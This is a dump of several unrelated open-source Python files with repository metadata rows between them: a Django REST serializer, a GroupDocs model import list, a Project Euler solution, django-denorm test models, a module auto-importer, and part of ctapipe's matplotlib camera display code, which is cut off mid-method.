eol = serializers.DateField()
def create(self, validated_data):
"""
Creates the SLAToComponentBranch entry based on the serialized data
"""
branch_component_type_name = validated_data['branch']['type']
component_type = ReleaseComponentType.objects.filter(
name=branch_component_type_name).first()
if not component_type:
error_msg = (
'The specified ReleaseComponentType "{0}" does not exist'
.format(branch_component_type_name))
raise serializers.ValidationError({'branch.type': [error_msg]})
branch_global_component_name = \
validated_data['branch']['global_component']
branch_global_component = GlobalComponent.objects.filter(
name=branch_global_component_name).first()
if not branch_global_component:
error_msg = ('The specified GlobalComponent "{0}" does not exist'
.format(branch_global_component_name))
raise serializers.ValidationError(
{'branch.global_component': [error_msg]})
branch_name = validated_data['branch']['name']
branch_critical_path = validated_data['branch'].get('critical_path')
branch = ComponentBranch.objects.filter(
name=branch_name,
type=component_type.id,
global_component=branch_global_component.id).first()
if branch:
# The critical_path field is optional, but if it was supplied and it
# doesn't match the found branch's critical_path field, raise an
# error
if branch_critical_path is not None and \
branch.critical_path != branch_critical_path:
error_msg = ('The found branch\'s critical_path field did not '
'match the supplied value')
raise serializers.ValidationError(
{'branch.critical_path': [error_msg]})
else:
# Set the default for this optional value when creating
if branch_critical_path is None:
branch_critical_path = False
branch = ComponentBranch(
name=branch_name,
type=component_type,
global_component=branch_global_component,
critical_path=branch_critical_path,
)
sla_name = validated_data['sla']
sla = SLA.objects.filter(name=sla_name).first()
if not sla:
error_msg = 'The specified SLA "{0}" does not exist'.format(
sla_name)
raise serializers.ValidationError({'sla': [error_msg]})
if SLAToComponentBranch.objects.filter(sla=sla.id, branch=branch.id).exists():
error_msg = (
'The SLA "{0}" tied to the component "{1}" and branch "{2}" '
'already exists').format(sla.name, branch.global_component.name,
branch.name)
raise serializers.ValidationError({'branch': [error_msg]})
# This tells us if the branch object was created or not
if branch._state.adding:
branch.save()
eol = validated_data['eol']
return SLAToComponentBranch.objects.create(
sla=sla, branch=branch, eol=eol)
def update(self, instance, validated_data):
"""
Updates the SLAToComponentBranch entry based on the serialized data
"""
branch = validated_data.get('branch', {})
branch_name = branch.get('name')
component_type = branch.get('type')
global_component = branch.get('global_component')
critical_path = branch.get('critical_path', None)
if branch:
if instance.branch.name != branch_name \
or instance.branch.type != component_type \
or instance.branch.global_component != global_component \
or (critical_path is not None and
instance.branch.critical_path is not critical_path):
raise serializers.ValidationError({
'branch': ['The branch cannot be modified using this API']})
# TODO: Should we not allow this value to change?
instance.sla = validated_data.get('sla', instance.sla)
instance.eol = validated_data.get('eol', instance.eol)
instance.save()
return instance
| 37.77027
| 86
| 0.63873
|
3664ceb34a2b9b706c877de0066d8bb576f3ebdc
| 13,750
|
py
|
Python
|
libs/groupdocs_conversion_cloud/models/__init__.py
|
rocketbot-cl/pdf2word
|
e46f6f574f69aa744e300baf4802e426b71bf9b2
|
[
"MIT"
] | null | null | null |
libs/groupdocs_conversion_cloud/models/__init__.py
|
rocketbot-cl/pdf2word
|
e46f6f574f69aa744e300baf4802e426b71bf9b2
|
[
"MIT"
] | null | null | null |
libs/groupdocs_conversion_cloud/models/__init__.py
|
rocketbot-cl/pdf2word
|
e46f6f574f69aa744e300baf4802e426b71bf9b2
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# flake8: noqa
from __future__ import absolute_import
# import models
from groupdocs_conversion_cloud.models.convert_options import ConvertOptions
from groupdocs_conversion_cloud.models.convert_settings import ConvertSettings
from groupdocs_conversion_cloud.models.disc_usage import DiscUsage
from groupdocs_conversion_cloud.models.document_metadata import DocumentMetadata
from groupdocs_conversion_cloud.models.error import Error
from groupdocs_conversion_cloud.models.error_details import ErrorDetails
from groupdocs_conversion_cloud.models.file_versions import FileVersions
from groupdocs_conversion_cloud.models.files_list import FilesList
from groupdocs_conversion_cloud.models.files_upload_result import FilesUploadResult
from groupdocs_conversion_cloud.models.load_options import LoadOptions
from groupdocs_conversion_cloud.models.object_exist import ObjectExist
from groupdocs_conversion_cloud.models.storage_exist import StorageExist
from groupdocs_conversion_cloud.models.storage_file import StorageFile
from groupdocs_conversion_cloud.models.stored_converted_result import StoredConvertedResult
from groupdocs_conversion_cloud.models.supported_format import SupportedFormat
from groupdocs_conversion_cloud.models.watermark_options import WatermarkOptions
from groupdocs_conversion_cloud.models.cad_load_options import CadLoadOptions
from groupdocs_conversion_cloud.models.csv_load_options import CsvLoadOptions
from groupdocs_conversion_cloud.models.diagram_load_options import DiagramLoadOptions
from groupdocs_conversion_cloud.models.email_load_options import EmailLoadOptions
from groupdocs_conversion_cloud.models.file_version import FileVersion
from groupdocs_conversion_cloud.models.html_convert_options import HtmlConvertOptions
from groupdocs_conversion_cloud.models.image_convert_options import ImageConvertOptions
from groupdocs_conversion_cloud.models.image_load_options import ImageLoadOptions
from groupdocs_conversion_cloud.models.one_load_options import OneLoadOptions
from groupdocs_conversion_cloud.models.pdf_convert_options import PdfConvertOptions
from groupdocs_conversion_cloud.models.pdf_load_options import PdfLoadOptions
from groupdocs_conversion_cloud.models.presentation_convert_options import PresentationConvertOptions
from groupdocs_conversion_cloud.models.presentation_load_options import PresentationLoadOptions
from groupdocs_conversion_cloud.models.spreadsheet_convert_options import SpreadsheetConvertOptions
from groupdocs_conversion_cloud.models.spreadsheet_load_options import SpreadsheetLoadOptions
from groupdocs_conversion_cloud.models.svg_convert_options import SvgConvertOptions
from groupdocs_conversion_cloud.models.txt_convert_options import TxtConvertOptions
from groupdocs_conversion_cloud.models.txt_load_options import TxtLoadOptions
from groupdocs_conversion_cloud.models.word_processing_convert_options import WordProcessingConvertOptions
from groupdocs_conversion_cloud.models.word_processing_load_options import WordProcessingLoadOptions
from groupdocs_conversion_cloud.models.xml_load_options import XmlLoadOptions
from groupdocs_conversion_cloud.models.xps_convert_options import XpsConvertOptions
from groupdocs_conversion_cloud.models.bmp_convert_options import BmpConvertOptions
from groupdocs_conversion_cloud.models.bmp_load_options import BmpLoadOptions
from groupdocs_conversion_cloud.models.cgm_convert_options import CgmConvertOptions
from groupdocs_conversion_cloud.models.dcm_convert_options import DcmConvertOptions
from groupdocs_conversion_cloud.models.dcm_load_options import DcmLoadOptions
from groupdocs_conversion_cloud.models.dgn_load_options import DgnLoadOptions
from groupdocs_conversion_cloud.models.djvu_convert_options import DjvuConvertOptions
from groupdocs_conversion_cloud.models.dng_convert_options import DngConvertOptions
from groupdocs_conversion_cloud.models.dng_load_options import DngLoadOptions
from groupdocs_conversion_cloud.models.doc_convert_options import DocConvertOptions
from groupdocs_conversion_cloud.models.doc_load_options import DocLoadOptions
from groupdocs_conversion_cloud.models.docm_convert_options import DocmConvertOptions
from groupdocs_conversion_cloud.models.docm_load_options import DocmLoadOptions
from groupdocs_conversion_cloud.models.docx_convert_options import DocxConvertOptions
from groupdocs_conversion_cloud.models.docx_load_options import DocxLoadOptions
from groupdocs_conversion_cloud.models.dot_convert_options import DotConvertOptions
from groupdocs_conversion_cloud.models.dot_load_options import DotLoadOptions
from groupdocs_conversion_cloud.models.dotm_convert_options import DotmConvertOptions
from groupdocs_conversion_cloud.models.dotm_load_options import DotmLoadOptions
from groupdocs_conversion_cloud.models.dotx_convert_options import DotxConvertOptions
from groupdocs_conversion_cloud.models.dotx_load_options import DotxLoadOptions
from groupdocs_conversion_cloud.models.dwf_load_options import DwfLoadOptions
from groupdocs_conversion_cloud.models.dwg_load_options import DwgLoadOptions
from groupdocs_conversion_cloud.models.dxf_load_options import DxfLoadOptions
from groupdocs_conversion_cloud.models.emf_convert_options import EmfConvertOptions
from groupdocs_conversion_cloud.models.emf_load_options import EmfLoadOptions
from groupdocs_conversion_cloud.models.eml_load_options import EmlLoadOptions
from groupdocs_conversion_cloud.models.emlx_load_options import EmlxLoadOptions
from groupdocs_conversion_cloud.models.epub_convert_options import EpubConvertOptions
from groupdocs_conversion_cloud.models.gif_convert_options import GifConvertOptions
from groupdocs_conversion_cloud.models.gif_load_options import GifLoadOptions
from groupdocs_conversion_cloud.models.ico_convert_options import IcoConvertOptions
from groupdocs_conversion_cloud.models.ico_load_options import IcoLoadOptions
from groupdocs_conversion_cloud.models.ifc_load_options import IfcLoadOptions
from groupdocs_conversion_cloud.models.igs_load_options import IgsLoadOptions
from groupdocs_conversion_cloud.models.j2c_load_options import J2cLoadOptions
from groupdocs_conversion_cloud.models.j2k_load_options import J2kLoadOptions
from groupdocs_conversion_cloud.models.jp2_load_options import Jp2LoadOptions
from groupdocs_conversion_cloud.models.jpeg_load_options import JpegLoadOptions
from groupdocs_conversion_cloud.models.jpf_load_options import JpfLoadOptions
from groupdocs_conversion_cloud.models.jpg_convert_options import JpgConvertOptions
from groupdocs_conversion_cloud.models.jpg_load_options import JpgLoadOptions
from groupdocs_conversion_cloud.models.jpm_load_options import JpmLoadOptions
from groupdocs_conversion_cloud.models.jpx_load_options import JpxLoadOptions
from groupdocs_conversion_cloud.models.mht_load_options import MhtLoadOptions
from groupdocs_conversion_cloud.models.mobi_load_options import MobiLoadOptions
from groupdocs_conversion_cloud.models.msg_load_options import MsgLoadOptions
from groupdocs_conversion_cloud.models.odg_convert_options import OdgConvertOptions
from groupdocs_conversion_cloud.models.odg_load_options import OdgLoadOptions
from groupdocs_conversion_cloud.models.odp_convert_options import OdpConvertOptions
from groupdocs_conversion_cloud.models.odp_load_options import OdpLoadOptions
from groupdocs_conversion_cloud.models.ods_convert_options import OdsConvertOptions
from groupdocs_conversion_cloud.models.ods_load_options import OdsLoadOptions
from groupdocs_conversion_cloud.models.odt_convert_options import OdtConvertOptions
from groupdocs_conversion_cloud.models.odt_load_options import OdtLoadOptions
from groupdocs_conversion_cloud.models.ost_load_options import OstLoadOptions
from groupdocs_conversion_cloud.models.otp_convert_options import OtpConvertOptions
from groupdocs_conversion_cloud.models.otp_load_options import OtpLoadOptions
from groupdocs_conversion_cloud.models.ots_convert_options import OtsConvertOptions
from groupdocs_conversion_cloud.models.ots_load_options import OtsLoadOptions
from groupdocs_conversion_cloud.models.ott_convert_options import OttConvertOptions
from groupdocs_conversion_cloud.models.ott_load_options import OttLoadOptions
from groupdocs_conversion_cloud.models.plt_load_options import PltLoadOptions
from groupdocs_conversion_cloud.models.png_convert_options import PngConvertOptions
from groupdocs_conversion_cloud.models.png_load_options import PngLoadOptions
from groupdocs_conversion_cloud.models.potm_convert_options import PotmConvertOptions
from groupdocs_conversion_cloud.models.potm_load_options import PotmLoadOptions
from groupdocs_conversion_cloud.models.potx_convert_options import PotxConvertOptions
from groupdocs_conversion_cloud.models.potx_load_options import PotxLoadOptions
from groupdocs_conversion_cloud.models.pps_convert_options import PpsConvertOptions
from groupdocs_conversion_cloud.models.pps_load_options import PpsLoadOptions
from groupdocs_conversion_cloud.models.ppsm_convert_options import PpsmConvertOptions
from groupdocs_conversion_cloud.models.ppsm_load_options import PpsmLoadOptions
from groupdocs_conversion_cloud.models.ppsx_convert_options import PpsxConvertOptions
from groupdocs_conversion_cloud.models.ppsx_load_options import PpsxLoadOptions
from groupdocs_conversion_cloud.models.ppt_convert_options import PptConvertOptions
from groupdocs_conversion_cloud.models.ppt_load_options import PptLoadOptions
from groupdocs_conversion_cloud.models.pptm_convert_options import PptmConvertOptions
from groupdocs_conversion_cloud.models.pptm_load_options import PptmLoadOptions
from groupdocs_conversion_cloud.models.pptx_convert_options import PptxConvertOptions
from groupdocs_conversion_cloud.models.pptx_load_options import PptxLoadOptions
from groupdocs_conversion_cloud.models.psd_convert_options import PsdConvertOptions
from groupdocs_conversion_cloud.models.psd_load_options import PsdLoadOptions
from groupdocs_conversion_cloud.models.pst_load_options import PstLoadOptions
from groupdocs_conversion_cloud.models.rtf_convert_options import RtfConvertOptions
from groupdocs_conversion_cloud.models.stl_load_options import StlLoadOptions
from groupdocs_conversion_cloud.models.tif_load_options import TifLoadOptions
from groupdocs_conversion_cloud.models.tiff_convert_options import TiffConvertOptions
from groupdocs_conversion_cloud.models.tiff_load_options import TiffLoadOptions
from groupdocs_conversion_cloud.models.tsv_convert_options import TsvConvertOptions
from groupdocs_conversion_cloud.models.tsv_load_options import TsvLoadOptions
from groupdocs_conversion_cloud.models.vdw_load_options import VdwLoadOptions
from groupdocs_conversion_cloud.models.vdx_load_options import VdxLoadOptions
from groupdocs_conversion_cloud.models.vsd_load_options import VsdLoadOptions
from groupdocs_conversion_cloud.models.vsdm_load_options import VsdmLoadOptions
from groupdocs_conversion_cloud.models.vsdx_load_options import VsdxLoadOptions
from groupdocs_conversion_cloud.models.vss_load_options import VssLoadOptions
from groupdocs_conversion_cloud.models.vssm_load_options import VssmLoadOptions
from groupdocs_conversion_cloud.models.vssx_load_options import VssxLoadOptions
from groupdocs_conversion_cloud.models.vst_load_options import VstLoadOptions
from groupdocs_conversion_cloud.models.vstm_load_options import VstmLoadOptions
from groupdocs_conversion_cloud.models.vstx_load_options import VstxLoadOptions
from groupdocs_conversion_cloud.models.vsx_load_options import VsxLoadOptions
from groupdocs_conversion_cloud.models.vtx_load_options import VtxLoadOptions
from groupdocs_conversion_cloud.models.webp_convert_options import WebpConvertOptions
from groupdocs_conversion_cloud.models.webp_load_options import WebpLoadOptions
from groupdocs_conversion_cloud.models.wmf_convert_options import WmfConvertOptions
from groupdocs_conversion_cloud.models.wmf_load_options import WmfLoadOptions
from groupdocs_conversion_cloud.models.xls2003_convert_options import Xls2003ConvertOptions
from groupdocs_conversion_cloud.models.xls2003_load_options import Xls2003LoadOptions
from groupdocs_conversion_cloud.models.xls_convert_options import XlsConvertOptions
from groupdocs_conversion_cloud.models.xls_load_options import XlsLoadOptions
from groupdocs_conversion_cloud.models.xlsb_convert_options import XlsbConvertOptions
from groupdocs_conversion_cloud.models.xlsb_load_options import XlsbLoadOptions
from groupdocs_conversion_cloud.models.xlsm_convert_options import XlsmConvertOptions
from groupdocs_conversion_cloud.models.xlsm_load_options import XlsmLoadOptions
from groupdocs_conversion_cloud.models.xlsx_convert_options import XlsxConvertOptions
from groupdocs_conversion_cloud.models.xlsx_load_options import XlsxLoadOptions
from groupdocs_conversion_cloud.models.xltm_convert_options import XltmConvertOptions
from groupdocs_conversion_cloud.models.xltm_load_options import XltmLoadOptions
from groupdocs_conversion_cloud.models.xltx_convert_options import XltxConvertOptions
from groupdocs_conversion_cloud.models.xltx_load_options import XltxLoadOptions
from groupdocs_conversion_cloud.models.j2c_convert_options import J2cConvertOptions
from groupdocs_conversion_cloud.models.j2k_convert_options import J2kConvertOptions
from groupdocs_conversion_cloud.models.jp2_convert_options import Jp2ConvertOptions
from groupdocs_conversion_cloud.models.jpeg_convert_options import JpegConvertOptions
from groupdocs_conversion_cloud.models.jpf_convert_options import JpfConvertOptions
from groupdocs_conversion_cloud.models.jpm_convert_options import JpmConvertOptions
from groupdocs_conversion_cloud.models.jpx_convert_options import JpxConvertOptions
from groupdocs_conversion_cloud.models.tif_convert_options import TifConvertOptions
| 78.571429
| 106
| 0.925164
|
a6f6a341cf14a73b34221eeabab8a24b578a6c7f
| 539
|
py
|
Python
|
151-200/p173.py
|
YiWeiShen/Project-Euler-Hints
|
a79cacab075dd98d393516f083aaa7ffc6115a06
|
[
"MIT"
] | 1
|
2019-02-25T13:00:31.000Z
|
2019-02-25T13:00:31.000Z
|
151-200/p173.py
|
YiWeiShen/Project-Euler-Hints
|
a79cacab075dd98d393516f083aaa7ffc6115a06
|
[
"MIT"
] | null | null | null |
151-200/p173.py
|
YiWeiShen/Project-Euler-Hints
|
a79cacab075dd98d393516f083aaa7ffc6115a06
|
[
"MIT"
] | null | null | null |
def cal_square_num(num):
sum = 0
for i in range(1, int(num/4)+2):
print(i)
if i % 2 == 0:
for j in range(2, int(num/4)+2, 2):
if 0 < i*i-j*j <= num:
sum += 1
else:
continue
else:
for j in range(1, int(num/4)+2, 2):
if 0 < i*i-j*j <= num:
sum += 1
else:
continue
return sum
if __name__ == '__main__':
print(cal_square_num(10**6))
| 24.5
| 47
| 0.374768
|
4d35126206f2ba9a42970402941202da99e1594a
| 9,148
|
py
|
Python
|
test_denorm_project/test_app/models.py
|
mristroph/django-denorm
|
7d1f720d67e5c58005140aee8d80d0adc6f03efa
|
[
"BSD-3-Clause"
] | 54
|
2015-10-04T07:15:02.000Z
|
2021-11-29T12:38:31.000Z
|
test_denorm_project/test_app/models.py
|
mristroph/django-denorm
|
7d1f720d67e5c58005140aee8d80d0adc6f03efa
|
[
"BSD-3-Clause"
] | 47
|
2015-08-12T12:15:50.000Z
|
2021-09-29T13:04:55.000Z
|
test_denorm_project/test_app/models.py
|
mristroph/django-denorm
|
7d1f720d67e5c58005140aee8d80d0adc6f03efa
|
[
"BSD-3-Clause"
] | 26
|
2015-08-21T18:29:53.000Z
|
2022-03-24T18:59:16.000Z
|
from django.db import connection
from django.conf import settings
from django.db import models
try:
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
except ImportError:
from django.contrib.contenttypes.generic import GenericForeignKey, GenericRelation
from django.contrib import contenttypes
from django.core.cache import cache
from denorm.fields import SumField
from denorm import denormalized, depend_on_related, CountField, CacheKeyField, cached
settings.DENORM_MODEL = 'test_app.RealDenormModel'
class FailingTriggersModelA(models.Model):
order = models.SmallIntegerField(default=0) # Fails for SQLite
SomeWeirdName = models.CharField(max_length=255) # Fails for PostgreSQL
class FailingTriggersModelB(models.Model):
a = models.ForeignKey(FailingTriggersModelA, on_delete=models.CASCADE)
@denormalized(models.TextField)
@depend_on_related(FailingTriggersModelA)
def SomeWeirdName(self):
return self.a.SomeWeirdName
class CachedModelA(models.Model):
b = models.ForeignKey('CachedModelB', on_delete=models.CASCADE)
@cached(cache)
@depend_on_related('CachedModelB')
def cached_data(self):
return {
'upper': self.b.data.upper(),
'lower': self.b.data.lower(),
}
class CachedModelB(models.Model):
data = models.CharField(max_length=255)
class AbstractDenormModel(models.Model):
# Skip feature test main model.
text = models.TextField()
@denormalized(models.TextField)
def ham(self):
return u"Ham and %s" % self.text
class Meta:
abstract = True
app_label = 'test_app'
class DenormModel(AbstractDenormModel):
@denormalized(models.TextField)
def spam(self):
return u"Spam and %s" % self.text
class Meta(AbstractDenormModel.Meta):
swappable = 'DENORM_MODEL'
class RealDenormModel(AbstractDenormModel):
@denormalized(models.TextField)
def eggs(self):
return u"Eggs and %s" % self.text
class Meta(AbstractDenormModel.Meta):
pass
class Tag(models.Model):
name = models.CharField(max_length=255)
content_type = models.ForeignKey(contenttypes.models.ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
class TaggedModel(models.Model):
tags = GenericRelation(Tag)
@denormalized(models.TextField)
@depend_on_related(Tag)
def tags_string(self):
return ', '.join(sorted([t.name for t in self.tags.all()]))
class Meta:
abstract = True
class Forum(TaggedModel):
title = models.CharField(max_length=255)
# Simple count() aggregate
post_count = CountField('post_set')
cachekey = CacheKeyField()
cachekey.depend_on_related('Post')
@denormalized(models.CharField, max_length=255)
@depend_on_related('Post')
def author_names(self):
return ', '.join((m.author_name for m in self.post_set.all()))
@denormalized(models.ManyToManyField, 'Member', blank=True)
@depend_on_related('Post')
def authors(self):
return [m.author for m in self.post_set.all() if m.author]
# let's say this forums supports subforums, sub-subforums and so forth
# so we can test depend_on_related('self') (for tree structures).
parent_forum = models.ForeignKey('self', blank=True, null=True, on_delete=models.CASCADE)
@denormalized(models.TextField)
@depend_on_related('self', type='forward')
def path(self):
if self.parent_forum:
return self.parent_forum.path + self.title + '/'
else:
return '/' + self.title + '/'
class Post(TaggedModel):
forum = models.ForeignKey(Forum, blank=True, null=True, on_delete=models.CASCADE)
author = models.ForeignKey('Member', blank=True, null=True, on_delete=models.CASCADE)
response_to = models.ForeignKey('self', blank=True, null=True, related_name='responses', on_delete=models.CASCADE)
title = models.CharField(max_length=255, blank=True)
# Brings down the forum title
@denormalized(models.CharField, max_length=255)
@depend_on_related(Forum)
def forum_title(self):
return self.forum.title
@denormalized(models.CharField, max_length=255)
@depend_on_related('Member', foreign_key="author")
def author_name(self):
if self.author:
return self.author.name
else:
return ''
@denormalized(models.PositiveIntegerField)
@depend_on_related('self', type='backward')
def response_count(self):
# Work around odd issue during testing with PostgresDB
if not self.pk:
return 0
rcount = self.responses.count()
rcount += sum((x.response_count for x in self.responses.all()))
return rcount
class PostExtend(models.Model):
# Test also OneToOneField
post = models.OneToOneField('Post', on_delete=models.CASCADE)
@denormalized(models.CharField, max_length=255)
@depend_on_related('Post')
def author_name(self):
return post.author.name
class Attachment(models.Model):
forum_as_object = False
post = models.ForeignKey(Post, blank=True, null=True, on_delete=models.CASCADE)
cachekey = CacheKeyField()
cachekey.depend_on_related('Post')
@denormalized(models.ForeignKey, Forum, blank=True, null=True, on_delete=models.CASCADE)
@depend_on_related(Post)
def forum(self):
if self.post and self.post.forum:
if self.forum_as_object:
# if forum_as_object is set, return forum denorm as an object
return self.post.forum
else:
# otherwise, return as a primary key
return self.post.forum.pk
return None
class Member(models.Model):
first_name = models.CharField(max_length=255)
name = models.CharField(max_length=255)
bookmarks = models.ManyToManyField('Post', blank=True)
cachekey = CacheKeyField()
cachekey.depend_on_related('Post', foreign_key='bookmarks')
@denormalized(models.CharField, max_length=255)
def full_name(self):
return u"%s %s" % (self.first_name, self.name)
@denormalized(models.TextField, null=True, blank=True)
@depend_on_related('Post', foreign_key="bookmarks")
def bookmark_titles(self):
if self.id:
return '\n'.join([p.title for p in self.bookmarks.all()])
class SkipPost(models.Model):
# Skip feature test main model.
text = models.TextField()
class CallCounter(models.Model):
@denormalized(models.IntegerField)
def called_count(self):
if not self.called_count:
return 1
return self.called_count + 1
class CallCounterProxy(CallCounter):
class Meta:
proxy = True
class SkipComment(models.Model):
post = models.ForeignKey(SkipPost, on_delete=models.CASCADE)
text = models.TextField()
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True, null=True, blank=True)
class Meta:
abstract = True
class SkipCommentWithoutSkip(SkipComment):
# Skip feature test model without a skip parameter on an updatable field.
# he updatable field will not be skipped.
@denormalized(models.TextField)
@depend_on_related(SkipPost)
def post_text(self):
return self.post.text
class SkipCommentWithSkip(SkipComment):
# Skip feature test model with a skip parameter on an updatable field.
@denormalized(models.TextField, skip=('updated_on',))
@depend_on_related(SkipPost)
def post_text(self):
return self.post.text
class SkipCommentWithAttributeSkip(SkipComment):
@denormalized(models.TextField)
@depend_on_related(SkipPost)
def post_text(self):
return self.post.text
denorm_always_skip = ('updated_on',)
class Team(models.Model):
@denormalized(models.TextField)
@depend_on_related('Competitor')
def user_string(self):
return ', '.join(sorted([u.name for u in self.competitor_set.all()]))
class Competitor(models.Model):
name = models.TextField()
team = models.ForeignKey(Team, on_delete=models.CASCADE)
if connection.vendor != "sqlite":
class FilterSumModel(models.Model):
# Simple count() aggregate
active_item_sum = SumField('counts', field='active_item_count', filter={'age__gte': 18})
class FilterSumItem(models.Model):
parent = models.ForeignKey(FilterSumModel, related_name='counts', on_delete=models.CASCADE)
age = models.IntegerField(default=18)
active_item_count = models.PositiveIntegerField(default=False)
class FilterCountModel(models.Model):
# Simple count() aggregate
active_item_count = CountField('items', filter={'active__exact': True}, exclude={'text': ''})
class FilterCountItem(models.Model):
parent = models.ForeignKey(FilterCountModel, related_name='items', on_delete=models.CASCADE)
active = models.BooleanField(default=False)
text = models.CharField(max_length=10, default='')
| 30.801347
| 118
| 0.697311
|
5d1b1c978ff48253495b6f6c39f34ab57d5ed4bd
| 314
|
py
|
Python
|
clks/optim/__init__.py
|
cjliux/mdst.c2f
|
5617624b25ddaa11ffbc07401d3fe0276ca220d5
|
[
"BSD-3-Clause"
] | 2
|
2020-07-17T12:12:35.000Z
|
2020-09-12T14:28:55.000Z
|
clks/optim/__init__.py
|
cjliux/mdst.c2f
|
5617624b25ddaa11ffbc07401d3fe0276ca220d5
|
[
"BSD-3-Clause"
] | null | null | null |
clks/optim/__init__.py
|
cjliux/mdst.c2f
|
5617624b25ddaa11ffbc07401d3fe0276ca220d5
|
[
"BSD-3-Clause"
] | null | null | null |
#coding: utf-8
# automatically import any Python files in the directory
import os
import importlib
for file in os.listdir(os.path.dirname(__file__)):
if file.endswith('.py') and not file.startswith('_'):
module = file[:file.find('.py')]
importlib.import_module('clks.optim.' + module)
| 31.4
| 57
| 0.678344
|
8cd4914f1a5defa0d752efd6236efbea385f0148
| 16,719
|
py
|
Python
|
ctapipe/visualization/mpl_camera.py
|
chaimain/ctapipe
|
ff80cff2daaf56e1d05ea6501c68fd83a9cf79d5
|
[
"BSD-3-Clause"
] | null | null | null |
ctapipe/visualization/mpl_camera.py
|
chaimain/ctapipe
|
ff80cff2daaf56e1d05ea6501c68fd83a9cf79d5
|
[
"BSD-3-Clause"
] | null | null | null |
ctapipe/visualization/mpl_camera.py
|
chaimain/ctapipe
|
ff80cff2daaf56e1d05ea6501c68fd83a9cf79d5
|
[
"BSD-3-Clause"
] | null | null | null |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Visualization routines using matplotlib
"""
import copy
import logging
import numpy as np
from astropy import units as u
from matplotlib import pyplot as plt
from matplotlib.collections import PatchCollection
from matplotlib.colors import Normalize, LogNorm, SymLogNorm
from matplotlib.patches import Ellipse, RegularPolygon, Rectangle, Circle
from numpy import sqrt
from ctapipe.instrument import PixelShape
__all__ = ["CameraDisplay"]
logger = logging.getLogger(__name__)
def polar_to_cart(rho, phi):
""""returns r, theta(degrees)"""
x = rho * np.cos(phi)
y = rho * np.sin(phi)
return x, y
class CameraDisplay:
"""
Camera Display using matplotlib.
Parameters
----------
geometry : `~ctapipe.instrument.CameraGeometry`
Definition of the Camera/Image
image: array_like
array of values corresponding to the pixels in the CameraGeometry.
ax : `matplotlib.axes.Axes`
A matplotlib axes object to plot on, or None to create a new one
title : str (default "Camera")
Title to put on camera plot
norm : str or `matplotlib.color.Normalize` instance (default 'lin')
Normalization for the color scale.
Supported str arguments are
- 'lin': linear scale
- 'log': logarithmic scale (base 10)
cmap : str or `matplotlib.colors.Colormap` (default 'hot')
Color map to use (see `matplotlib.cm`)
allow_pick : bool (default False)
if True, allow user to click and select a pixel
autoupdate : bool (default True)
redraw automatically (otherwise need to call plt.draw())
autoscale : bool (default True)
rescale the vmin/vmax values when the image changes.
This is set to False if `set_limits_*` is called to explicity
set data limits.
Notes
-----
Speed:
CameraDisplay is not intended to be very fast (matplotlib
is not a very speed performant graphics library, it is
intended for nice output plots). However, most of the
slowness of CameraDisplay is in the constructor. Once one is
displayed, changing the image that is displayed is relatively
fast and efficient. Therefore it is best to initialize an
instance, and change the data, rather than generating new
CameraDisplays.
Pixel Implementation:
Pixels are rendered as a
`matplotlib.collections.PatchCollection` of Polygons (either 6
or 4 sided). You can access the PatchCollection directly (to
e.g. change low-level style parameters) via
`CameraDisplay.pixels`
Output:
Since CameraDisplay uses matplotlib, any display can be
saved to any output file supported via
plt.savefig(filename). This includes ``.pdf`` and ``.png``.
"""
def __init__(
self,
geometry,
image=None,
ax=None,
title=None,
norm="lin",
cmap=None,
allow_pick=False,
autoupdate=True,
autoscale=True,
show_frame=True,
):
self.axes = ax if ax is not None else plt.gca()
self.pixels = None
self.colorbar = None
self.autoupdate = autoupdate
self.autoscale = autoscale
self._active_pixel = None
self._active_pixel_label = None
self._axes_overlays = []
self.geom = geometry
if title is None:
title = f"{geometry.camera_name}"
# initialize the plot and generate the pixels as a
# RegularPolyCollection
patches = []
if hasattr(self.geom, "mask"):
self.mask = self.geom.mask
else:
self.mask = np.ones_like(self.geom.pix_x.value, dtype=bool)
pix_x = self.geom.pix_x.value[self.mask]
pix_y = self.geom.pix_y.value[self.mask]
pix_width = self.geom.pixel_width.value[self.mask]
for x, y, w in zip(pix_x, pix_y, pix_width):
if self.geom.pix_type == PixelShape.HEXAGON:
r = w / np.sqrt(3)
patch = RegularPolygon(
(x, y),
6,
radius=r,
orientation=self.geom.pix_rotation.to_value(u.rad),
fill=True,
)
elif self.geom.pix_type == PixelShape.CIRCLE:
patch = Circle((x, y), radius=w / 2, fill=True)
elif self.geom.pix_type == PixelShape.SQUARE:
patch = Rectangle(
(x - w / 2, y - w / 2),
width=w,
height=w,
angle=self.geom.pix_rotation.to_value(u.deg),
fill=True,
)
patches.append(patch)
self.pixels = PatchCollection(patches, cmap=cmap, linewidth=0)
self.axes.add_collection(self.pixels)
self.pixel_highlighting = copy.copy(self.pixels)
self.pixel_highlighting.set_facecolor("none")
self.pixel_highlighting.set_linewidth(0)
self.axes.add_collection(self.pixel_highlighting)
# Set up some nice plot defaults
self.axes.set_aspect("equal", "datalim")
self.axes.set_title(title)
self.axes.autoscale_view()
if show_frame:
self.add_frame_name()
# set up a patch to display when a pixel is clicked (and
# pixel_picker is enabled):
self._active_pixel = copy.copy(patches[0])
self._active_pixel.set_facecolor("r")
self._active_pixel.set_alpha(0.5)
self._active_pixel.set_linewidth(2.0)
self._active_pixel.set_visible(False)
self.axes.add_patch(self._active_pixel)
if hasattr(self._active_pixel, "xy"):
center = self._active_pixel.xy
else:
center = self._active_pixel.center
self._active_pixel_label = self.axes.text(
*center, "0", horizontalalignment="center", verticalalignment="center"
)
self._active_pixel_label.set_visible(False)
# enable ability to click on pixel and do something (can be
# enabled on-the-fly later as well:
if allow_pick:
self.enable_pixel_picker()
if image is not None:
self.image = image
else:
self.image = np.zeros_like(self.geom.pix_id, dtype=np.float64)
self.norm = norm
self.auto_set_axes_labels()
def highlight_pixels(self, pixels, color="g", linewidth=1, alpha=0.75):
"""
Highlight the given pixels with a colored line around them
Parameters
----------
pixels : index-like
The pixels to highlight.
Can either be a list or array of integers or a
boolean mask of length number of pixels
color: a matplotlib conform color
the color for the pixel highlighting
linewidth: float
linewidth of the highlighting in points
alpha: 0 <= alpha <= 1
The transparency
"""
l = np.zeros_like(self.image)
l[pixels] = linewidth
self.pixel_highlighting.set_linewidth(l)
